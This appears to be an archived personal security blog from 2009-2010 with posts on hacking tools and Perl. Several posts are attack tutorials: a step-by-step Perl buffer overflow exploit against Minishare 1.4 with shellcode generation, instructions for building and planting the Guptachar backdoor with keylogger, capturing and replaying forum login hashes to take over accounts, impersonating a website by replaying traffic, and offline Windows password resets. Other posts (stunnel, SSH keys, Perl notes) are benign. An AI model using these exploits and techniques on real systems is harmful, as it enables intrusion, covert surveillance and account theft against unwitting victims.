http://archangelamael.blogspot.com/2009/12/using-nexpose-in-back-track-4.html

Easy File sharing with Minishare

2010-01-22T17:13:00.000-08:00

What can i say, i love small, non-complex tools that get the job done and minishare happens to be one of them. Whenever i leave my house and want to be able access certain files from anywhere without haveing to set up FTP's (most of them tend to be vulnerable to some exploit anyways) and complex webservers. Minishare is the simplest and most elegant solution i've come across. Its quite intuitive to use, reading the user manual is far from necessary, its that easy. Simply run the server and start dragging and dropping your files that you want to share, thats all. To access the files remotely, simply point to the IP of that machine (external IP) using a web browswer and voila, you are presented with the files as a list, where you can click to download them as you please. Most important, its 100% free.

Note: Please download the latest versions of the application. In my previous blog, i blog about a buffer overflow vulnerability in version 1.4, that led to remote code execution. Latest version available at this posting is 1.54.

Resources / Good Reading:
http://minishare.sourceforge.net/

Developing an exploit for buffer overflows...The Entire Life Cycle.

2010-01-22T11:33:00.000-08:00

Being a little familiar with reverse engineering windows executables, it wa time for me to take the next step. I'm quite familiar with using metasploit to exploit systems and gain root on systems but being the guy that i am, i like to just know how the underlying technology of things work. Having some background in reverse engineering and exploiting systems was all the prerequsites i needed to take the next big step, writting my own code to exploit systems.

Recently i started learning perl and wrote some nifty sniffer applications that can retrieve passwords and so forth. As everything i learnt in perl was still fresh in my head, i decided to use perl as the platform i would use to write exploits. I also followed this tutorial throughout my learning of writing exploits, even though they used python. I took the extra step in porting the code to perl :).

Needed Software:
minishare 1.4
Ollydebug
Backtrack 4

Minishare is a minimal webserver running on port 80 that shares files. You run the program, add files to it, then you can access these files via a remote web browser and download them. In version 1.4 there was reported that there was a buffer overflow vunerability within the software (http://secunia.com/advisories/13114/). You can find information about software or OS vulnerabilities and exploit codes at websites such as http://secunia.com/advisories/search, www.milw0rm.com and www.exploit-db.com.

Ollydbg is a win32 debuffer/assembler application that i frequently use for reverse engineering purposes.

Open up the minishare.exe in Ollydbg and hit f9 key to start the execution.

The next thing you want to do is trigger the vulnerability. From http://secunia.com/advisories/13114, we see that the exploit is triggered by sending a specially crafted overly long request with a pathname larger than 1787 bytes. So lets get to some perl code.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x41" x 2000;
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

The above perl code would connect to host 192.168.1.60 on tcp port 80 then send the malformed GET request to crash the minishare server. You should notice that EIP(Instruction pointer) and ESP (Stack pointer) have been over written with values of 41414141 respectively.

We need to find out the offsets of EIP and ESP in our malformed sent string buffer. We use Metasploit's tools, patter_create and patter_offset to aid in this process.

#./patter_create 2000.
Copy the generated characters to your perl code.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .=("Aa0Aa1....
6Ac7Ac......................
f3Af4A.....");
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

Press ctrl and f2 to restart the execution of minishare from within Ollydbg. Run the new perl code now and note the value of EIP and the value of the location ESP points to. Now goback to our metasploit tools.

#./patter_offset 36684335
1787 //offset for EIP
#./patter_offset 43376843
1791 //offset for ESP

The offset of EIP, we are going to put the location of a location in memory that points back to the stack, i.e, JMP ESP. We are going to search through the loaded application modules (Dlls) and search for any JMP ESP instruction. Note, we want to avoid any address that contains a zero byte \x00. This character is considered a string terminator in the C programming language, and usually has the effect of breaking an exploit when it is included within a buffer. For a similar reason, we also want to avoid the line feed and carriage return characters \x0a and \x0d.

To search for JMP ESP, Withing Ollydbg, goto View -> Loadable modules. I like to use system modules, such as user32.dll and shell32.dll. Right click shell32.dll for example and click on "view code in CPU". Right click in the code view and select search for, then goto command. Type "JMP ESP". When one is found write down that address (7C9D30F3). We are now goingto point to this address in our perl code and replace EIP with it since we know where to put it (remember the offset of EIP was 1787).

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x90" x 1787;
$buff .= "\xF3\x30\x9D\x7C";
$buff .= "\x90" x 16;
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

Note that we wrote the memory address of 7C9D30F3 backwards, i.e , "\xF3\x30\x9D\x7C" as per x86 architechure.

Restart minishare in Ollydbg, set a breakpoint at the memory location of the JMP ESP that we found and run. Exewcute the perl exploit. Notice that it has hit our break point? ALL thats left to do is to put our shellcode in. We turn to metasploit again for this

#./msfpayload windows/exec CMD=calc.exe R | ./msfencode -a x86 -b '\x00\x0A\x0D' -t c

We had to pipe the output of the shellcode to msfencode so we can get rid of the pescky bytes '\x00\x0A\x0D'
'-b' tells it to avoid this list of characters
'-a x86' tells it the architechture to encode as
'-t c' format to display is c code format

Next we copy our shell code to our perl program.

#!/usr/local/bin/perl
#
#
#
use IO::Socket;
############
$port="80";
$host="192.168.1.60";
$proto="tcp";

$sock = IO::Socket::INET->(PeerPort=> $port, $PeerAddr=> $host, Proto=> $proto) or die ("Connection issue");

$buff="GET ";
$buff .="\x90" x 1787;
$buff .= "\xF3\x30\x9D\x7C";
$buff .= "\x90" x 16;
$buff .=
"\xd5\xa0\x76.......".
"\x32\x47\xe8.......".
"\x12\x4f\xd9........".
"\x3c\x76\x1A";
$buff .=" HTTP/1.1\r\n\r\n";

print $sock "$buff";
close ($sock);

Restart in Ollydbg. Send the perl exploit and if all went well, calc.exe should be executed on that machine, i.e. You have just taken advantage of the remote code execution vulnerability.

References/Good Reading:
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

Guptachar 2.0 (Remote Administration Tool)

2010-01-18T09:36:00.000-08:00

A RAT or remote administration tool allows an admin to remotely administer a remote machine on the same IP network, including the internet. Other RAT tools include VNC viewer, Microsoft remote desktop, backorfice, Netbus etc. While all these tools are similar in many ways and some having more features than the other they all require their own client software to administer the remote machines. Guptachar doesn't. Well it does but you already have it installed on your machine without actually doing so. It uses any webrowser as its client software. You just point your browser to the IP/port combo of the remote machine and you're good to go. Also, Guptachar can only be installed a Windows machinel, however, you can still administer the windows machine with any linux web browser.

Download: http://packetstormsecurity.org/trojans/gupt2.zip

Download and unzip the contents. Open up a command prompt window and run makeqinst.exe and answer the accompanying questions. The program makes a server excuteable that when run would install as a backdoor. It provides some basic authentication and the listening port is custamizable. The resulting executable would be copied to the target machine and then run.

Effects:
Opens up a port on the machine(confirm with a netstat -an).
Name of executable in task manager is GPTCR2.exe.
Creates the following files in C:\WINDOWS directory: GPTCRKL folder, GPTCR.nfo and GPTCR2.exe
Creates a registry entry: HKCU/Sofware/Microsoft/Windows/CurrentVersion/Run/GPTCR2 //please note that the path created is broken and does not link directly to the executable. Im not sure why this was not fixed but the registry key becomes useless unless you manually channge it to the correct path of the GPTCR2.exe executable. This makes the backdoor start up when the machine is rebooted.
Update: It turns out that in the c code, the author used a fixed length of the string path of 14, which results in "c:\windows\gpt". The fix would be to use a length of 21 of let the c code find the length of the path instead of using a fixed length
There maybe one or two other registry entries, just search for them using "GPTCR" as the search query.
The keylogger log file is also created at c:\WINDOWS\GPTCRKL\ directory called LOGFILE.key.

That all the setup required. Now point your web browser to the ip/port combo of this machine and commence your admin duties.

Resources/Good reading:
http://packetstormsecurity.org/trojans/gupt2.zip
http://www.megasecurity.org/trojans/g/guptachar/Guptachar2.0.html

More tunneling with SSL and stunnel

2010-01-18T06:06:00.000-08:00

We've discussed tunneling in the past with regards to httptunnel and ptunnel. As effective as these methods are for bypassing firewall rules and other purposes, neither ptunnel or httptunnel provide any means of encryption (although shh tunneling does, something i've discussed in a previous post).
Using programs like wiresark, you can easily see the payloads of the tunneled traffic. SSL tunnel provides similar tunneling funtionalities as the other tunneling programs but provides the much needed encryption to mitigate eaves droppers. I'll disscus all the needed steps to set-up a Windows client and a Linux Server.

Server [linux] - 10.0.0.1
Client [Windows XP] - 10.0.0.2

SERVER Setup:

First thing you need to do is generate a x509 certificate file to be used for encrytion if one doesnt already exist [It should be loacated at /etc/stunnel/stunnel.pem]. I usally like to generate my own and customize the certificate with my name, email, location, etc.

To generate an x509 cert, type:
openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem

After the cert is generated the server can be set up using the following commands:
stunnel -d 2222 -r 127.0.0.1:80 -p /root/stunnel.pem

The server would now be listening on port 2222 for incoming client traffic. Traffic connecting to the servers listening port would be forwarded to 127.0.0.1 at port 80.

CLIENT setup:

Download the Stunnel setup for windows and install. Heres a link to the latest compiled binaries:
http://www.stunnel.org/download/stunnel/win32/stunnel-4.29-installer.exe

Rename the original stunnel.conf file to stunnel.conf.bak for backup purposes.

Now make a file named stunnel.conf in that same directory. Input the following using notepad:

Client = yes
[my_https]
accept = 80
connect = 10.0.0.1:2222

Save this file. Now run stunnel.exe (You can also run from the command line: c:\stunnel.exe stunnel.conf). Stunnel looks for stunnel.conf in the same directory by default. If you choose to use a config file with a different name, you would have to open up the command prompt and type as follows to run: c:\stunnel.exe myconfigfile.conf.Your client would now be listening on port 80. To use the tunnel, type in your browser, http://127.0.0.1:80. You should now see the webpage. This webpage was successfully transfered over your securely created ssl tunnel.

Resources/Good reading:
www.stunnel.org
http://freshmeat.net/articles/ssl-encrypting-syslog-with-stunnel
http://librenix.com/?inode=7126

Parsing tcp data without NetPacket::*

2010-01-12T05:54:00.000-08:00

Just some code that i wrote that demonstrates how to extract the data contents of a packet without using the NetPackets::* suite of modules. Note that you would have to know the byte starting position(offset) of the data contents of the packet type in order to correctly extract what you will need. In this example, the offset that im using for DNS data is 55 (14 bytes for Ethernet, 20 for IP header, 8 for UDP header and 12 for some dns flags ). Therefore the DNS quesries start at the 55th byte in DNS query packets.

#!/usr/local/bin/perl
#
#
#
use strict;
use Net::Pcap;
##################

my $dev=$ARGV[0];
my $filter = 'udp dst port 53';
my $object;
my $filter_t;
my ($net,$mask,$err,$object);
##################

unless (defined $dev){
print 'Interface not set or is incorrect';
}

print "Sniffing on interface: $dev\n";

if (Net::Pcap::lookupnet($dev, \$net, \$mask, \$err) == -1){
die "Net::Pcap::lookupnet failed - $err";
}

$object = Net::Pcap::open_live($dev, 1500, 0 , 0, \$err );
unless (defined $object){
print 'Unable to create packet cxapture on device - ', $dev, ' - ', $err;
}

if (Net::Pcap::compile($object, \$filter_t, $filter, 1, $mask) == -1){
die 'Unable to compile filter string - ', $filter;
}

Net::Pcap::setfilter($object,$filter_t);
Net::Pcap::loop($object, -1, \&process_packets, 0);
Net::Pcap::close($object);
##########################################

sub process_packets{
my($user_data, $hdr, $pkt) = @_;
my $len = length($pkt);
for (my $count = 55; $count <= $len; $cout++){
my ($data) = sprintf ("%s", chr(ord(substr($pkt,$count,1))));
print "$data";
}
print "\n";
}

Creating a sniffer using perl

2010-01-07T15:57:00.001-08:00

Below is simple program i wrote to sniff live DNS requests so a network admin can have an idea of the websites that a user is requesting in real time.

#!/usr/local/bin/perl
#
#
#
use strict;
use Net::Pcap;
use NetPacket::Ethernet;
use NetPacket::IP;
use NetPacket::TCP;
##################################

# Variable Declarations
my $filter_t;
my ($tcp,$ip,$ethernet);
my ($net,$mask,$err);
my $dev = $ARGV[0]; //takes the network card interface as the first parameter
my $filter = "udp dst port 53"; //this is the filter we are going to use, in tcpdump notaion
my $optimize = 1;
############################################

# Determine network number and mask for use later on when we're compiling our filter
if (Net::Pcap::lookupnet($dev, \$net, \$mask, \$err) == -1){
die 'Cannot determine network number and subnet mask - ' , $err;
}

# create a live pcap capture object
my $pcap_object = Net::Pcap::open_live($dev, 1500, 0, 0, \$err);
if (defined $err){
die 'Failed to create live capture on - ' , $dev , ' - ', $err;
}

Net::Pcap::compile($pcap_object, \$filter_t, $filter, $optimize, $mask); //compile our filter ,$filter and return it in the $filter_t variable
Net::Pcap::setfilter($pcap_object, $filter_t); //set the compliled filter, of $filter_t
Net::Pcap::loop($pcap_object, -1, \&capture_packets, '') || die 'Unable to perform packet capture'; //loop or sniff packets on the network infinitly
Net::Pcap::close($pcap_object); //close the pcap object gracefully
#######################################

# subroutine to handle each packet that is sniffed
sub capture_packets {
my ($user_data, $hdr, $pkt) = @_; //this line should always be present to handle the incoming packets, You refer to the incoming packets from $pkt as you would see from the next lines of code
my $ethernet = NetPacket::Ethernet->decode($pkt); //decodes the ethernet frame
my $ip = NetPacket::IP->decode($ethernet->{data}); // decodes the IP headers
my $tcp = NetPacket::TCP->decode($ip->{data}); // decodes the TCP data
print "$ip->{src_ip} -> $ip->{dest_ip} : "; // prints source to destination IP's
print "$tcp->{data}\n"; //prints the data contained in this packet
}

The unfortunate thing about dns request is that there can be so many of them, even when you request one website. For instance, try going to www.google.com. You would notice that you capture the dns request for www.google.com in addition to a couple other request that the google page itself has made for you.

Perl - Notes

2009-12-29T11:11:00.000-08:00

I have decided to learn perl as i began to encouter many perl scripts used for forensics and pentesting. I believe it would help me learn more if i write my own tools and understand the entire process a little bit better. This blog would house my notes and cheat sheets from day one.

Perl is a case sensitive language.

Starting line of every perl program
#!/usr/local/bin/perl

Printing text:
print 'hello world';

When printing from a variable use double quotes instead of single quotes. Information within the single quotes are interpreted as is.
print "$var1";

Declare and assign a variable. This variable is known as a scalar variable. Scalar variables are simple variables containing only one element--a string, a number, or a reference. Strings may contain any symbol, letter, or number. Numbers may contain exponents, integers, or decimal values.
$var1 = 1;
$var1 = 'hello world';

Declare an Array:
@food = ("rice", "eggs", "orange");

Accessing a portion of an array
print "$food[1]"; //this here would print eggs with reference to the above example

Finding length of array just involves redifing the array as a scalar variable. For instance
@food = ("rice", "eggs", "orange");
print "$3"; // This would output '3'

Add and Remove elements from an array

push() - adds an element to the end of an array.
unshift() - adds an element to the beginning of an array.
pop() - removes the last element of an array.
shift() - removes the first element of an array.

Concatanate two string variables;
print $string.$linebreak;

Opening a file and printing its contents like the unix program 'cat'
$file_path = '/root/myfile.txt';
open (file1, "$file_path");
@mydata = ;
close(file1);
print @mydata;

Formating Characters
http://www.tizag.com/perlT/perlstrings.php

Regular Expression Cheat Cheets
http://www.cs.tut.fi/~jkorpela/perl/regexp.html

Using substrings.
To use substr() to grab a substring, you need to give it both a string variable to pick something out of and an offset (which starts at 0). The first argument of substr() is the string we want to take something from and the second argument is the offset, or where we want to start at. Substr function can take a third and forth argument, third being the length and forth being a replacement string value.

$mystr = "hello world";
$mystr1 = substr($mystr, 2);
$mystr2 = substr($mystr, 2, 3);
$mystr3 = substr($mystr, 6, 5, "there");

print "$mystr1"; // this would print 'llo world'
print "$mystr2"; // this would print 'llo'
print "$mystr"; // this would print 'hello there'. Note we are printing $mystr and not mystr3 here

Transforming strings into arrays with split function
$mystr = 'the/boy/walked/fast';
@myarr = split('/', $mystr);
print "@myarr"; // this prints 'the boy walked fast'

Likewise we can join elements of an array into a scalar string.
@array = ("David","Larry","Roger","Ken","Michael","Tom");
@array2 = qw(Pizza Steak Chicken Burgers);

@array = ("a") x 10;
print "@array"; //would print the character 'a' 10 times

# JOIN 'EM TOGETHER
$firststring = join(", ",@array);
$secondstring = join(" ",@array2);

Sorting arrays
@myarr = ("chicken" , "eggs", "apples");
@myarr = sort(@myarr);

Conditions and loops are Similar in syntax to C.
[While loop]
$a = ; //Read input from keyboard
while ($a ne "kill")
{
print "wrong";
$a = ; //Read input from keyboard
}

print "Correct";

[For loop]
" for ($x = 0; $x < style="color: rgb(255, 0, 0);">{
print "$x\n";
}

[until statement]
$a = 1;
do
{
print $a;
$a++;
}
while ($a <>

[If statement]
" $a = "hello" ; "
if (length ($a) > 3)
{
print "more than 3 characters";
}

[RE expression] using =~ or !~
$word = "Hello my good friend";
if ($word =~ /my/)
{
print "found the word: my"
exit;
}
print "Not found";

The opposite of the above would be to use '!~' instead of '=~'.

Substitution/replacement:
$word = "canada states";
$word =~ s/canada/United/ //replaces only the first occurance of the string canada with United
$word =~ s/canada/United/g //the addition of the g in the end would replace all occurances of the string. It represents global change.
$word =~ s/[Hh][Oo][Pp][Ee]/Hope/g //This pretty much ignores the case. The next example is a better way to do this
$word =~ s/CanADa/Canada/gi // The 'i' in the end ignores case

$search = "the";
s/$search/xxx/g;

will replace every occurrence of the with xxx. If you want to replace every occurence of there then you cannot do s/$searchre/xxx/ because this will be interpolated as the variable $searchre. Instead you should put the variable name in curly braces so that the code becomes $search = "the";

s/${search}re/xxx/;

Character Translation
$a = "abc";
$a =~ tr/abc/boy/; // will trnaslate a to a b, b to an o and c to a y
print $a; // will print boy

$count = ($a =~ tr/*/*/); //the statement here counts the number of asterisks in the $sentence variable and stores that in the $count variable.

However, the dash is still used to mean "between". This statement converts $_ to upper case. tr/a-z/A-Z/;

Sorting Arrays of words
@array1 = ("orange","yellow","Red","green,","blue");
@sorted = sort(@array1); //Sorts in alphabetical order
@sorted_reversed = sort {$b cmp $a} (array1); //sorts in reverse order

Sorting arrays of numbers
@array1 = (5,7,2,4,1,8,6);
@sorted = sort (@array1); //sorts in alphabetical order
@sorted_reversed = sort {$b <=> $a} (@array1); //sorts in reverse order

Key Functions to remember
my $position = index($longString, $shortstring); //returns the position of a character or substring in a string
splice (@myarr, 2 , 3); // If you have an array of 7 elements, this function reads all the 5 elements and starting from with position two(which is actually the third position, as the first element starts with a 0) cuts the next three elements.

pcapcat, dumping the contents of a tcp stream

2009-12-21T08:00:00.000-08:00

Pcapcat is a simple perl script that can dump the contents of a tcp stream. The script gives an index of the tcp streams that it identifies (by default shows only new tcp connection streams, those initialize by syn packets but you have the option to show all already established connections as well) and you would use this index to indentify which stream you would like to dump.

usage:
# perl pcapcat -r pcap_file // displays new connection streams. Already established connections would be ignored

# perl pcapcat -r pcap_file -a // '-a' displays already established connections. Useful in many cases where the initial communication had already commenced like a conversation.

# perl pcapcat -h // gives you a listing of all the options used with pcapcat

Resources/Good reading:
http://blog.kiddaland.net/2009/09/network-forensics-puzzle/

smtpcat, Parseing emails from a pcap file

2009-12-21T06:34:00.001-08:00

I learned of the tool from a forensic contest blog i've been following for awhile now. This tool came about when a challenge was posed to determine the contents of an email from a pcap file. I've posted the solutions to this contest in an early blog entry (still have to update the part on getting the password) but my methods were not very automated and as easy as one might want things to be. A perl script, Smtpcat, came about to resolve this issue. From the author, Amar Yousif,
"I wrote smtpcat which will loop through a pcap file and identify all of the smtp conversations in it. Smtpcat dive deep into the payload and identifies the sender, receiver, date, subject, and optionally the AuthSMTP decoded password. The tool also has the ability to dump the payload of any smtp message as an eml file that can be further opened via outlook express for example. "

This tool definitly would make my life easier when pasrsing through network captures for email messages and its contents. Im happy i did things using a more manual procedure, just goes to show that i understood what i was doing.

usage:
# perl smtpcat -r pcap_file -p // '-r' reads the pcap and '-p' tells smtpcat to decode the smtp password

[1] 192.168.1.159:1036 -> 64.12.102.142:587
[1] sneakyg33k@aol.com -> sec558@gmail.com Sat, 10 Oct 2009 07:35:30 -0600
[1] SUBJ: lunch next week
[1] PASS:558r00lz

[2] 192.168.1.159:1038 -> 64.12.102.142:587
[2] sneakyg33k@aol.com -> mistersecretx@aol.com Sat, 10 Oct 2009 07:38:10 -0600
[2] SUBJ: rendezvous
[2] PASS:558r00lz

The above shows two email conversations being sent. Smtpcat identifies the sender and recipient as well as the smtp password.

# perl smtpcat -r pcap_file -p -d 2 -w message.eml // '-d 2' dumps the content of the smtp message from index 2 (index 2 was identified with the first command output above). '-w' writes the contents of the smtp message to a file

You can then open the message.eml file in outlook express to get the email body and possible attachments.

For more commands type: # perl smtpcat -h

Resources/Good reading:
http://forensicscontest.com/contest02/Finalists/Amar_Yousif/narrative.txt
http://www.yousicurity.com

Replaying captured web traffic using ncat

2009-12-16T07:43:00.000-08:00

If you are not familiar with the whole idea of replaying a packet then you should get to googling. The basic idea behind this methodology is to sniff and capture interesting information from either the client or server then replay them. By doing this you can mimic a certain client's request or a server's response and vice versa. In the my demo, i will demonstrate how i was able to capture a users 'GET' request for a website (in my demo, www.ask.com) and the server's response and use the captured response to replay the same data that www.ask.com responds with to client request. This has the effect of mimicing a site and in some ways tricking a user to believe they are at the website of www.ask.com when they are basically connected to your machine. Not as fun as gaining a shell but with your imagination, you can come up with ideas for interesting packets to replay that can form the basis for some more fun stuff.

Steps:

Use wireshark to capture packets of a user making a request for www.ask.com on their web browser
Use a display filter for that stream and filter the stream to show only the servers response. Save the data of the servers response to a file.
Start up ncat to replay the saved response(data)
"# ncat --send-only -l 80 < response"
Use a web browser to connect to your ncat 'fake' webserver.

If you were to practice this on a few websites you're gonna notice that not all of the contents of the page might be displayed. If you've written html code before, you should already know why this is so. If you wanna get crafty and do some editing of the packets to change some directory paths, that should get things up and running, but to me its not worth the effort since im no criminal. YES, if you actually took the time to modify the response in such a way that you will get all the original's website content to show, then you more than likely have some evil intentions in mind.

Video demonstration...

Untitled from aerokid240 on Vimeo.

SSH public and private key authentication

2009-12-10T06:03:00.000-08:00

If anyone has played with ssh before, you should be quite familiar with login in with your password/passphrase to the ssh server. There is nothing wrong with this method of authentication at all as long as you have a complex password thats extremely hard to guess. However there is a more advanced method of authentication used by many professional organizations and businesses and the internet as well, known and Public key authentication. This system utilizes two keys, a public key known to everyone and is used for encryption and a private or secret key known only to the recipient of the message. In ssh, the use of the private keys are only for authentication purposes but then all of the communications are done using a negotiated symmetric key, which is a key common to both the sender and reciever of the message that is used to decrypt and encrypt the message.

SSh is commonly used for remote administering of machines, but is very common in the unix environment. As an administrator, we want to be able automate most of our tasks remotely over ssh, but the problem that arises is the password prompt screen. How can we automate a remote task if the machine we are login into is gonna ask for a password everytime we try to log on? The answer is to utilize the public and private key authentication method. You specify a private key to be used to authenticate on to the remote machine. The remote machine should have a matching public key under the logging in user account. Wants the pair of the public and private key is made, access is granted automatically withouth the use for a password/passphrase.

[tools]
sshd [linux]
Putty [windows]
Puttygen [windows]

Step 1. Using puttygen, generate a 1024 bit rsa keys and save the public and private key portion to a USB key (mykey.pub and mykey.ppk ).

Step 2. Copy the puiblic key (mykey.pub) to the unix machine into the "/root/.ssh/" folder

Step 3. Convert the puttygen public key to an openssh format.
# ssh-keygen -i -f /root/.ssh/mykey.pub > mykey2.pub

Step 4. Paste the contents of the public key into a file called authorized_keys or
authorized_keys2
# touch authorized_keys
# cat mykey2.pub >> authorized_keys

Step 5. Using putty, enter in root@10.0.0.1, assuming 10.0.0.1 is the remote hosts ip address.

Step 6. Under the 'Connections' section in putty, goto the 'SSH' sub section then 'Auth'. Browse
for your private key (mykey.ppk) then click on open

If all went well you should be granted access to the root account without having to enter a password. If you were using a linux client, this could have been automated using bash scripts and all that is required is for you to place your private key in your local home directory in the .ssh folder, i.e, /home/user1/.ssh/

Resources/Good reading:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
http://hkn.eecs.berkeley.edu/~dhsu/ssh_public_key_howto.html

Video Demo of me exploiting Internet explorer 6 on XP SP2

2009-12-09T17:47:00.000-08:00

It cannot be stressed enough why you should always try to keep your software patched and up to date. Alot of individuals understand that updates can add new features and fix some bugs but don't have a clue about the security aspects of it. You may have come around the term 'exploit' before but don't really quite grasp the concept of it. An exploit is special code that attempts to capitalize on what is known as software vulnerabilities, and in capitalize i mean do something that is of the benefit to the attacker. In the hacker culture, most of the time we would want to exploit software in hopes of gaining "shell" access which is basically a command prompt environment of the exploited machine. Picture being at a Windows machine at the command line and the amount of power you have at your arsenal. You can create user accounts, kill process, create and delete files, etc. This is what the hacker hopes to gain from his exploit, such an environment where he can command your machine via a shell, i.e. command prompt from his own attacking machine.

In my video demonstration, im gonna exploit a vulnerability in IE 6 on a XP SP2 machine. The attacker sets up his machine as a special type of web server awaiting a user to connect to his machine using internet explorer(you can force a user to connect to your machine via dns spoofing on a LAN, see my earlier post on dnspoof). When the victim browses to the attackers web page(of was forced onto the page by the attacker) an exploit is run on the victims browser and on the attacking machine if the exploit was successful you would get a command prompt/shell of the victims machine. From here the attacker can take command of the victim's computer and is only limited by his imagination.

[Tools used]
Metasploit-v3.4

Internet Explorer 6 exploit from aerokid240 on Vimeo.

New Video demos

2009-12-07T21:37:00.000-08:00

[Breaking into facebook and gmail without a username and password]
***** http://aerokid240.blogspot.com/2009/11/ferret-and-hamster-20-sidejacking.html

[Eaves dropping on your neighbours msn conversations]
*****http://aerokid240.blogspot.com/2009/11/msgsnarf.html

[Exploiting IE6 on XP SP2 machine to gain shell access]
*****http://aerokid240.blogspot.com/2009/12/video-demo-of-me-exploiting-internet.html

Video illustrations on the way...

2009-12-07T14:55:00.001-08:00

I know some of the demo's my leave you a bit puzzled at times but some of the concepts cant be adopted overnight. And as you would have noticed, most of the demo's use linux quite heavily adding to the frustration to most windows users. The good news today is i just got an account with www.vimeo.com so now i can add video illustrations to some of my blogs. I'm gonna go back to some of my previous post and add some video illustrations to them. If there is any request for any visual illustration on any previous post, just leave a comment or shoot me an email.

How you can steal log-on credentials from forum based websites using Paros and ngrep

2009-12-05T17:05:00.000-08:00

As you can imagine, ngrep would be our sniffer that would parse out the necessary information that we would be looking for. But what is Paros and what is it gonna be used for? Paros is a proxy, but unlike traditional proxies, it allows you to modify certain parameters in http request and reply packets. How we are gonna use it in our demo is to modify the password field of a http POST to input the appropriate password. Confused? Well just follow my demo and hopefully all will be clear.

First we use ngrep (look back at my earlier post for info on using ngrep) to sniff out the important information when the user logs in. Note that sometimes the passwords may be in cleartext or in a md5hash. If the password is in MD5 hash form, we can use online resources to crack them or dont even bother cracking them. Why not just use the hash to login? Is it possible? Yes.. and thats what ill be showing you.

[Note, you would be required to perform some form of man in the middle attack in order to be able to sniff the packets]

Setting up ngrep to sniff:
# ngrep -W byline -d eth0 -q "POST" port 80 //we are sniffing of port 80 for the string 'POST', i.e when a user hits the login button a post would be send to the logon server. '-W byline' makes the output to standard out more readable.

On some other machine [victim machine], login to your favorite forum website and pay attention to ngrep's output. It should have captured the post packet with your username and password. Like i said earlier, sometimes the password is not in plain-text. Sometimes it would be and MD5 hash. Lets see how we can use this hash with Paros proxy.

Lets fire up Paros on the attacking machine.
# java -jar paros.jar

On the attacking machine, open up your web browser and change its network settings to use the proxy 127.0.0.1 on port 8080. Trying browseing to a website to confirm the proxy works. Paros should now have captured traffic.

In the "Trap" tab select "trap request". Now navigate to the same forum website that you've captured info from. On the login form, put in the username that you would have captured and some bogus password and hit the submit button. Notice that the web page is stuck loading and paros is blinking. Lets investigate. Paros has captured the request and is awaiting on some sort of feedback from you. At this point you can see that paros has captured the login request. The username is the right one u typed in and the password is in some encrypted md5 form. Its actually the md5sum to the bogus password you inputed. What we wanna do is take the md5 hash that we captured from the ngrep output, and input it in the paros parameter screen (easier to view it in tabular view). Note you gon need to enter it in two places, the "vb_login_md5password" and "vb_login_md5password_utf". After you've done this, deselct the trap request option and hit the continue button. Guess what has happend............... You've now logged into your victims account.

To help in my above illustration, here's a video illustrating the simplicity of the attack. Note that the user uses a different sniffer to sniff on the wire.

[video]: http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Resources/Good reading:
http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Using netcat to stream music with mpg123

2009-12-05T16:10:00.001-08:00

Like my previos post, i used netcat as a simple one page webserver, basically having netcat listen on port 80 and anything that connects to port 80, send them an html file. Simple enough. This post shows how we can use the same concept and listen on a port and send an mp3 over the network to connecting clients. Mpg123 is a command line utility that basically play music on the command line. You can see how netcat and mpg123 is used together to stream music accross the network.

Demo:
[server]10.0.0.1
[client]10.0.0.2

[server] # cat music_file.mp3 | nc -l -p 4444 //listens on port 4444 and cats the contents of the mp3 file accross the network

[client] # nc 10.0.0.1 4444 | mpg123 - // connects to the server on port 4444 and plays what ever data comes through its connection

Resources/Good reading:
http://www.hak5.org/episodes/episode-514

Using netcat and ncat as simple webservers

2009-12-03T11:59:00.000-08:00

Nothing too fancy here, but just an illustration of how versatile the netcat tool is/can be. We all know netcat to be a simple backdoor utility that can be used for simple chats and file transfers. Well to add to its long list of possibilities and features, i am going to set up a one page webserver. Useful if you got to set up a notification about your page being down for maintenance. In its basic form, we set up a netcat listener on port 80 then pipe or push a file into the connection when clients connect.

[for netcat] "# while true; do nc -l -p 80 -q 1 < index.html" ; done
[for ncat] "# while true; d0 ncat -l 80 --send-only < index.html ; done"

Note: we set up a while loop to keep the connection open to accept other requests. Using "-k" in ncat would not work in this instance as using the "--send-only" terminates the connection when all data has been sent to the client.

References/Good reading:
http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
http://www.stearns.org/doc/nc-intro.current.html

Another example where physical access always gets you in (using chntpw)

2009-12-03T08:28:00.000-08:00

Chnypw is a small linux utilty that is used to (re)set the password of any valid local account on a windowsNT, 2000 and XP machine (have not tried on vista and 7). Knowledge of the old password for an account is not needed to set a new one. The tool works by modifying crypted data in the registry's SAM file. This utilty works with syskey and includes the option to turn it off.

The target Windows machine needs to be in offline mode which means that the installed OS should not be loaded. You're gonna need a bootable linux distrobution (CD or bootable usb works) with chntpw package installed.

Steps:

Mount the NTFS drive. Needs to be mounted for read/write and not read-only.
# mount -t ntfs-3g /dev/sda1 /mnt/disk1 or # ntfsmount /dev/sda1 /mnt/disk1 -o default_permissions
Navigate to the location of the SAM file, typically located at \windows\system32\config
# cd /mnt/disk1/WINDOWS/System32/Config
Make a back up of the SAM, security and system files.
# cp SAM SAM.bak && cp security security.bak && cp system system.bak
Run chntpw in interactive mode with the SAM, system and security file as arguments.
# chntpw -i SAM security system
You should be presented with an interactive screen where you can list the local users and change or reset their passwords.
